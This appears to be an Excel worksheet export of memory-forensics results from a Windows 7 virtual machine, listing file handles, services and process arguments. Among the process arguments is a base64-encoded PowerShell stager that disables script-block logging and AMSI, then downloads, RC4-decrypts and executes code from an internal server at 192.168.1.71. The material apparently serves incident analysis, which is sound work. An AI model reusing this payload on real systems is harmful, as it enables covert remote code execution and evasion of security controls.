  <si>
    <t>\Users\Wilfred\Videos\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfda4340</t>
  </si>
  <si>
    <t>0xdfda5cb8</t>
  </si>
  <si>
    <t>0xdfda6460</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Crypto\RSA\MachineKeys\ef75242024ec0e5ea270d79b2efe29b4_365abb72-f240-4</t>
  </si>
  <si>
    <t>0xdfda6ae8</t>
  </si>
  <si>
    <t>\Windows\System32\Wpc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfda7e18</t>
  </si>
  <si>
    <t>\Windows\System32\synceng.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfda8780</t>
  </si>
  <si>
    <t>0xdfda8e18</t>
  </si>
  <si>
    <t>0xdfda9368</t>
  </si>
  <si>
    <t>0xdfda9420</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\FTK Imager.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdab418</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Promp</t>
  </si>
  <si>
    <t>0xdfdab698</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XCHWY7CN\v</t>
  </si>
  <si>
    <t>ideoplayback[</t>
  </si>
  <si>
    <t>2].dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdabcf0</t>
  </si>
  <si>
    <t>\Windows\System32\audiodev.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdac038</t>
  </si>
  <si>
    <t>qdefaultHQBYS</t>
  </si>
  <si>
    <t>VHE.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdac2a0</t>
  </si>
  <si>
    <t>\Windows\System32\syncui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdad238</t>
  </si>
  <si>
    <t>0xdfdad4b0</t>
  </si>
  <si>
    <t>0xdfdadf00</t>
  </si>
  <si>
    <t>0xdfdae420</t>
  </si>
  <si>
    <t>\Users\Wilfred\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdaedb0</t>
  </si>
  <si>
    <t>0xdfdaf038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration</t>
  </si>
  <si>
    <t>Management.l</t>
  </si>
  <si>
    <t>0xdfdaf0f8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdaf220</t>
  </si>
  <si>
    <t>0xdfdaf608</t>
  </si>
  <si>
    <t>0xdfdaf898</t>
  </si>
  <si>
    <t>0xdfdafb40</t>
  </si>
  <si>
    <t>\Windows\System32\sendmail.dll_x001B_[0K_x001B_[42G</t>
  </si>
  <si>
    <t>0xdfdafd60</t>
  </si>
  <si>
    <t>2.regtrans-ms</t>
  </si>
  <si>
    <t>0xdfdafe18</t>
  </si>
  <si>
    <t>\Windows\System32\sendmail.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb0038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\6V4CPUIW.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb0120</t>
  </si>
  <si>
    <t>0xdfdb0450</t>
  </si>
  <si>
    <t>0xdfdb26c8</t>
  </si>
  <si>
    <t>0xdfdb27e0</t>
  </si>
  <si>
    <t>0xdfdb2940</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\IconCache.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb2d00</t>
  </si>
  <si>
    <t>0xdfdb3770</t>
  </si>
  <si>
    <t>0xdfdb38d8</t>
  </si>
  <si>
    <t>0xdfdb3990</t>
  </si>
  <si>
    <t>\Windows\System32\wpdshext.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb3a90</t>
  </si>
  <si>
    <t>\Windows\System32\WMVCORE.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb3cd0</t>
  </si>
  <si>
    <t>0xdfdb4408</t>
  </si>
  <si>
    <t>0xdfdb4668</t>
  </si>
  <si>
    <t>0xdfdb4730</t>
  </si>
  <si>
    <t>\Windows\System32\WMASF.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb4bb0</t>
  </si>
  <si>
    <t>0xdfdb4e70</t>
  </si>
  <si>
    <t>0xdfdb5338</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\5PAZQIXR.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb5958</t>
  </si>
  <si>
    <t>0xdfdb5be8</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb6038</t>
  </si>
  <si>
    <t>0xdfdb61c8</t>
  </si>
  <si>
    <t>\Windows\System32\cryptext.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb6808</t>
  </si>
  <si>
    <t>0xdfdb7310</t>
  </si>
  <si>
    <t>0xdfdb78f0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\DOVULAX5.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb7a08</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb9038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\GameExplorer.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb92d0</t>
  </si>
  <si>
    <t>0xdfdb9690</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Users\Wilfred\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdb9a78</t>
  </si>
  <si>
    <t>0xdfdb9c70</t>
  </si>
  <si>
    <t>qdefault[8].j</t>
  </si>
  <si>
    <t>0xdfdbad00</t>
  </si>
  <si>
    <t>0xdfdbbd60</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdbbe18</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdbe590</t>
  </si>
  <si>
    <t>\Windows\System32\zipfldr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdbf038</t>
  </si>
  <si>
    <t>0xdfdbf330</t>
  </si>
  <si>
    <t>0xdfdbf588</t>
  </si>
  <si>
    <t>0xdfdbf7a8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Protect\CREDHIST_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdbf9c8</t>
  </si>
  <si>
    <t>0xdfdbfb30</t>
  </si>
  <si>
    <t>0xdfdc0950</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\getevent.types.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc0a08</t>
  </si>
  <si>
    <t>\Windows\System32\networkitemfactory.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc0ac0</t>
  </si>
  <si>
    <t>\Windows\System32\shfolder.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc1260</t>
  </si>
  <si>
    <t>0xdfdc19a8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Identities\Updater.bat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc1ac0</t>
  </si>
  <si>
    <t>B2D351_4EBC99</t>
  </si>
  <si>
    <t>DE7AED7A90E</t>
  </si>
  <si>
    <t>58B4E6</t>
  </si>
  <si>
    <t>1941A140C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc46e0</t>
  </si>
  <si>
    <t>0xdfdc5038</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc5148</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\WSMan.Format.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc5268</t>
  </si>
  <si>
    <t>0xdfdc5460</t>
  </si>
  <si>
    <t>0xdfdc6038</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc7308</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc73c0</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc74a0</t>
  </si>
  <si>
    <t>2D351_4EBC99D</t>
  </si>
  <si>
    <t>E7AED7A90E5</t>
  </si>
  <si>
    <t>8B4E61</t>
  </si>
  <si>
    <t>941A140C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc8310</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdc8670</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\NetworkProjection.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdcc3e0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.ln</t>
  </si>
  <si>
    <t>0xdfdcc8b8</t>
  </si>
  <si>
    <t>0xdfdcd588</t>
  </si>
  <si>
    <t>0xdfdce398</t>
  </si>
  <si>
    <t>\Windows\System32_x001B_[0K_x001B_[44G</t>
  </si>
  <si>
    <t>0xdfdcf038</t>
  </si>
  <si>
    <t>d0}.TM.blf_x001B_[0</t>
  </si>
  <si>
    <t>0xdfdcf0f8</t>
  </si>
  <si>
    <t>0xdfdcf1b0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\5VJ00H70.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdcf3d0</t>
  </si>
  <si>
    <t>0xdfdcf5f0</t>
  </si>
  <si>
    <t>0xdfdcf810</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdcfb40</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdcfd60</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Credentials_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdcff80</t>
  </si>
  <si>
    <t>0xdfdd2b00</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk_x001B_[0</t>
  </si>
  <si>
    <t>0xdfdd57e8</t>
  </si>
  <si>
    <t>0xdfdd6200</t>
  </si>
  <si>
    <t>qdefaultQ32CR</t>
  </si>
  <si>
    <t>HFG.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdd9230</t>
  </si>
  <si>
    <t>0xdfddaae0</t>
  </si>
  <si>
    <t>0xdfddb7a8</t>
  </si>
  <si>
    <t>0xdfddbe60</t>
  </si>
  <si>
    <t>0xdfddc038</t>
  </si>
  <si>
    <t>0xdfdde580</t>
  </si>
  <si>
    <t>\Windows\System32\perfnet.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdde6a0</t>
  </si>
  <si>
    <t>0xdfddfcb0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\HYD5LADI.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfddff80</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\WmiPerfClass.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfde0248</t>
  </si>
  <si>
    <t>0xdfde0cb0</t>
  </si>
  <si>
    <t>qdefaultZNNIH</t>
  </si>
  <si>
    <t>TU5.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfde4038</t>
  </si>
  <si>
    <t>0xdfde4b68</t>
  </si>
  <si>
    <t>0xdfde4ef0</t>
  </si>
  <si>
    <t>0xdfde5328</t>
  </si>
  <si>
    <t>0xdfde5f80</t>
  </si>
  <si>
    <t>0xdfde7cb0</t>
  </si>
  <si>
    <t>0xdfde8268</t>
  </si>
  <si>
    <t>0xdfded220</t>
  </si>
  <si>
    <t>0xdfdedd10</t>
  </si>
  <si>
    <t>0xdfdefd60</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\dfrgui.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfdefe18</t>
  </si>
  <si>
    <t>0xdfdf06e0</t>
  </si>
  <si>
    <t>0xdfdf54a8</t>
  </si>
  <si>
    <t>0xdfdf7a88</t>
  </si>
  <si>
    <t xml:space="preserve">Offset  </t>
  </si>
  <si>
    <t xml:space="preserve">Name </t>
  </si>
  <si>
    <t>LocalService</t>
  </si>
  <si>
    <t>QAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkAZQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArA</t>
  </si>
  <si>
    <t>CcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAVABWAEEAbAB1AGUAKAAkAE4AVQBsAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQAp</t>
  </si>
  <si>
    <t>AHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwB</t>
  </si>
  <si>
    <t>nAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAG8AbABMAGUAYwB0AEkATwBuAHMALgBHAGUAbgBFAHIASQBDAC4ARABpAGMAdABJAG8ATgBBAHIAeQBbAHMAVA</t>
  </si>
  <si>
    <t>BSAEkATgBnACwAUwBZAFMAdABlAG0ALgBPAEIAagBFAEMAVABdAF0AOgA6AG4ARQBXACgAKQA7ACQAVgBBAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAU</t>
  </si>
  <si>
    <t>wBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcA</t>
  </si>
  <si>
    <t>aQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEATAB9AEUATABTAGUAewBbAFMAYwByAEkAcAB0AEIAbABPAEMASwBdAC4AIgBHAEUAVABGAGkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHI</t>
  </si>
  <si>
    <t>AZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBhAGwAdQBFACgAJABuAFUATABsACwAKABOAGUAdwAtAE8AYgBqAGUAYwBUACAAQwBvAGwATABlAEMAdABJAE8ATgBzAC4ARwBFAE4ARQBSAGkAQwAuAEgAYQBzAEgAUwBFAFQAWwBzAFQAUgBJAG</t>
  </si>
  <si>
    <t>4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBJA</t>
  </si>
  <si>
    <t>GUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEAbAB1AEUAKAAkAG4AVQBsAEwALAAkAFQAUgB1AGUAKQB9ADsAfQA7AFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFMARQBSAFYAaQBjAGUAUABv</t>
  </si>
  <si>
    <t>AGkAbgB0AE0AQQBOAEEAZwBFAHIAXQA6ADoARQBYAFAAZQBDAFQAMQAwADAAQwBPAG4AVABpAE4AVQBlAD0AMAA7ACQAVwBjAD0ATgBlAHcALQBPAEIAagBlAEMAVAAgAFMAWQBTAHQAZQBtAC4ATgBFAHQALgBXAEUAQgBDAEwASQBlAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKAB</t>
  </si>
  <si>
    <t>XAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQARQByAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJA</t>
  </si>
  <si>
    <t>B1ACkAOwAkAFcAQwAuAFAAcgBPAFgAWQA9AFsAUwBZAHMAdABFAG0ALgBOAEUAdAAuAFcARQBCAFIAZQBRAFUAZQBTAHQAXQA6ADoARABlAEYAYQB1AGwAdABXAGUAQgBQAFIAbwB4AFkAOwAkAFcAQwAuAFAAUgBPAHgAeQAuAEMAcgBFAEQAZQBuAHQASQBhAEwAUwAgAD0AIABbAFMAWQBTAFQAZQBtAC4AT</t>
  </si>
  <si>
    <t>gBFAFQALgBDAHIAZQBEAGUAbgB0AGkAQQBsAEMAYQBjAEgARQBdADoAOgBEAEUAZgBhAHUAbABUAE4AZQB0AHcATwBSAGsAQwBSAGUARABFAE4AdABpAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAHMAVABFAE0ALgBUAGUA</t>
  </si>
  <si>
    <t>WABUAC4ARQBuAGMAbwBEAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQBUAEUAUwAoACcAXQBoAHEAMQBqACkAYwAjADwAWQA1AEYAUgA4AFgALwBCAHYAYQB3AHsAJgA2AC4ARQAhAD4ASwB+AHoATQAlACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBzADsAJABTAD0AMAAuAC4</t>
  </si>
  <si>
    <t>AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoAC</t>
  </si>
  <si>
    <t>QASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdA</t>
  </si>
  <si>
    <t>H0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA3ADEAOgA4ADAAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAVwBjAC4ASABlAGEARABFAFIAUwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AagArAGYAdgA3</t>
  </si>
  <si>
    <t>AFMAMQBUAEEAcwBhAG4ASABsAHIAMwBzAGIARAB1AHIAbgBzAHkAZAByADQAPQAiACkAOwAkAEQAYQBUAEEAPQAkAFcAQwAuAEQATwB3AG4ATABvAGEARABEAEEAVABhACgAJABTAGUAcgArACQAdAApADsAJABpAFYAPQAkAGQAQQB0AGEAWwAwAC4ALgAzAF0AOwAkAEQAQQBUAEEAPQAkAGQAQQB0AGEAWwA</t>
  </si>
  <si>
    <t>0AC4ALgAkAGQAQQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQB0AEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==</t>
  </si>
  <si>
    <t>Process</t>
  </si>
  <si>
    <t>Args</t>
  </si>
  <si>
    <t>ServerDll=winsrv:ConS</t>
  </si>
  <si>
    <t>erverDllInitialization,2</t>
  </si>
  <si>
    <t>C:\Windows\system32\services.exe</t>
  </si>
  <si>
    <t>C:\Windows\system32\lsass.exe</t>
  </si>
  <si>
    <t>C:\Windows\system32\lsm.exe</t>
  </si>
  <si>
    <t>C:\Windows\system32\svchost.exe</t>
  </si>
  <si>
    <t>DcomLaunch</t>
  </si>
  <si>
    <t>C:\Windows\System32\VBoxService.exe</t>
  </si>
  <si>
    <t>RPCSS</t>
  </si>
  <si>
    <t>C:\Windows\System32\svchost.exe</t>
  </si>
  <si>
    <t>LocalServiceNetworkRestricted</t>
  </si>
  <si>
    <t>LocalSystemNetworkRestricted</t>
  </si>
  <si>
    <t>netsvcs</t>
  </si>
  <si>
    <t>GPSvcGroup</t>
  </si>
  <si>
    <t>NetworkService</t>
  </si>
  <si>
    <t>C:\Windows\System32\spoolsv.exe</t>
  </si>
  <si>
    <t>LocalServiceNoNetwork</t>
  </si>
  <si>
    <t>utcsvc</t>
  </si>
  <si>
    <t>LocalServiceAndNoImpersonation</t>
  </si>
  <si>
    <t>"C:\Program</t>
  </si>
  <si>
    <t>Files\OpenSSH\bin\cygrunsrv.exe"</t>
  </si>
  <si>
    <t>C:\Windows\system32\wlms\wlms.exe</t>
  </si>
  <si>
    <t>"538639267498848267-1306416709-1141630329-115703250-983314866-1518251301-442674640</t>
  </si>
  <si>
    <t>Files\OpenSSH\usr\sbin\sshd.exe"</t>
  </si>
  <si>
    <t>C:\Windows\system32\sppsvc.exe</t>
  </si>
  <si>
    <t>NetworkServiceNetworkRestricted</t>
  </si>
  <si>
    <t>secsvcs</t>
  </si>
  <si>
    <t>C:\Windows\system32\SearchIndexer.exe</t>
  </si>
  <si>
    <t>/Embedding</t>
  </si>
  <si>
    <t>"taskhost.exe"</t>
  </si>
  <si>
    <t>"C:\Windows\system32\Dwm.exe"</t>
  </si>
  <si>
    <t>"1238788108538425884-910628392408509066-9957047621558862419-5072041261499987778</t>
  </si>
  <si>
    <t>SQBGACgAJABQAFMAVgBlAFIAUwBpAE8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAHIAUwBJAE8ATgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBzAEUAbQBiAGwAeQAuAEcARQB0AF</t>
  </si>
  <si>
    <t>"C:\Windows\System32\VBoxTray.exe"</t>
  </si>
  <si>
    <t>Explorer\iexplore.exe"</t>
  </si>
  <si>
    <t>C:\Windows\system32\AUDIODG.EXE</t>
  </si>
  <si>
    <t>0x77c</t>
  </si>
  <si>
    <t>C:\Windows\system32\wbem\wmiprvse.exe</t>
  </si>
  <si>
    <t>"C:\Windows\system32\wuauclt.exe"</t>
  </si>
  <si>
    <t>"\\Vboxsvr\d_drive\Imager_Lite_3.1.1\FTK</t>
  </si>
  <si>
    <t>Imager.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">COMPUTERNAME    IEWIN7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</si>
</sst>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">
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FFFFFF00"/>
          <bgColor rgb="FF00000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263D4-D8FD-4ADA-A04C-E99746FB3FAC}" name="Таблица1" displayName="Таблица1" ref="A1:J86" totalsRowShown="0">
  <autoFilter ref="A1:J86" xr:uid="{BAC263D4-D8FD-4ADA-A04C-E99746FB3FAC}">
    <filterColumn colId="1">
      <filters>
        <filter val="TCPv4"/>
        <filter val="UDPv4"/>
      </filters>
    </filterColumn>
  </autoFilter>
  <tableColumns count="10">
    <tableColumn id="1" xr3:uid="{7435315A-EB27-41D7-9A56-AD3AA488CA8A}" name="Столбец1"/>
    <tableColumn id="2" xr3:uid="{75333AB4-0D27-42A2-9898-3889538A4C56}" name="Столбец2"/>
    <tableColumn id="3" xr3:uid="{00B655B2-D40F-4CDF-84DB-CA8E52B50059}" name="Столбец3"/>
    <tableColumn id="4" xr3:uid="{609F8C60-3A55-4E0C-B486-5A131CC788A1}" name="Столбец4"/>
    <tableColumn id="5" xr3:uid="{C3F64808-7940-484F-827B-5A756E27D318}" name="Столбец5"/>
    <tableColumn id="6" xr3:uid="{CFF3851E-7E43-4E5D-80C2-32A304760B42}" name="Столбец6"/>
    <tableColumn id="7" xr3:uid="{552E3EE9-50DA-4FAA-8CEB-0B38B13FCA7A}" name="Столбец7"/>
    <tableColumn id="8" xr3:uid="{A0906EF3-4790-487A-9014-E6B569CE3B67}" name="Столбец8"/>
    <tableColumn id="9" xr3:uid="{68EFFBC6-D5EC-44AD-A218-7EA290FC3FE2}" name="Столбец9" dataDxfId="1"/>
    <tableColumn id="10" xr3:uid="{6184EADA-77D4-4D4D-AAC5-DDB6D64C9A93}" name="Столбец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984DD-E8D1-4EF1-B3CC-8B9E580089AA}" name="Таблица2" displayName="Таблица2" ref="A1:H107" totalsRowShown="0">
  <autoFilter ref="A1:H107" xr:uid="{421984DD-E8D1-4EF1-B3CC-8B9E580089AA}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{BCA6E391-379B-4161-B57B-84FBE54BA170}" name="Offset"/>
    <tableColumn id="2" xr3:uid="{8CFA8F86-CA51-4DA2-B3CA-E8D264B00D9F}" name="Start"/>
    <tableColumn id="3" xr3:uid="{CC23C17D-739E-4FEB-92A3-12FBD402E4D5}" name="Size"/>
    <tableColumn id="4" xr3:uid="{9F973A22-F860-4B43-91F0-8FABCA947BA3}" name="Service"/>
    <tableColumn id="5" xr3:uid="{624F211D-9486-4DC6-8980-100F39797161}" name="Key"/>
    <tableColumn id="6" xr3:uid="{2E9A7419-6F88-4689-83DB-9F590BF6FA73}" name="Driver"/>
    <tableColumn id="7" xr3:uid="{3E9AFB2E-DF29-445B-B59C-858E62472F99}" name="Name"/>
    <tableColumn id="8" xr3:uid="{5549B71B-8A03-48A9-9724-41A7AFF46C82}" name="Name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3BCDC6-DEA9-4F25-8227-98C81F921FA7}" name="Таблица3" displayName="Таблица3" ref="A1:I106" totalsRowShown="0">
  <autoFilter ref="A1:I106" xr:uid="{C63BCDC6-DEA9-4F25-8227-98C81F921FA7}">
    <filterColumn colId="3">
      <filters>
        <filter val="False"/>
      </filters>
    </filterColumn>
    <filterColumn colId="4">
      <filters>
        <filter val="True"/>
      </filters>
    </filterColumn>
  </autoFilter>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{994B67EB-4E3F-4600-A9AF-C35384516A6F}" name="Столбец1"/>
    <tableColumn id="2" xr3:uid="{F41506A5-7CB3-485A-9B64-A97EC8880D4A}" name="Столбец2"/>
